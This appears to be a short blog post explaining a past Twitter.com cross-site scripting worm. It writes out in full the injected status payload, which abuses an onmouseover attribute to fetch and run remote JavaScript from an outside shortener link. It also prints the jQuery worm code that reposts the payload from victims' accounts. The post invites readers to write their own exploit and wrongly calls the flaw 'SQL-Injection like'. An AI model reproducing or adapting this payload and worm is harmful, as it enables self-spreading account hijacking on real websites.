Eran Kampf
Eran Kampf
1 min read

Write your own Twitter.com XSS exploit

So it seems the new twitter.com has a “virus” going around.
Few minutes ago my twitter stream filled up with strange jQuery calls so I looked into it.

Apperantly the new Twitter website is colunerable to a simple SQL-Injection like attack.
It’ll just spit out to the page whatever HTML code you write on your status…

So, the exploit work like this:

Step 1:

User writes the following status line:

http://t.co/@”style=”font-size:999999999999px;”onmouseover=”$.getScript(‘http:\u002f\u002fis.gd\u002ffl9A7’)”/

the @” basically closes the tweet’s html element title attribute and lets the hacker had his own attributes. Specifically an onmouseover attribute that’ll run his JavaScript code when the users hover over the tweet.

Step 2:

The onmouseover event fetches and executes a remote JS code from

http://is.gd/fl9A7

Step 3:

The remote script (which is not subject to size limits like the script embedded in the user’s status can basically do whatever the hacker wants.
This one just plays with the page’s HTML to submit a new tweet (from step #1) and spread itself on:

[js wraplines=”true”]
$(‘#status’).val(“http://t.co/@\"style=\"font-size:999999999999px;\"\
onmouseover=\"$.getScript(‘http:\\u002f\\u002fis.gd\\u002ffl9A7’)\"/”);
$(‘.status-update-form’).submit();
$(‘#status-field-char-counter’).html(“ekampf owns you!”);
$(‘#status’).val(‘I read how to do this on DeveloperZen.com’);
$(‘.status-update-form’).submit();
[/js]

Besides submitting tweets, you can pretty much do whatever you want with the page’s UI etc…
lots of fun…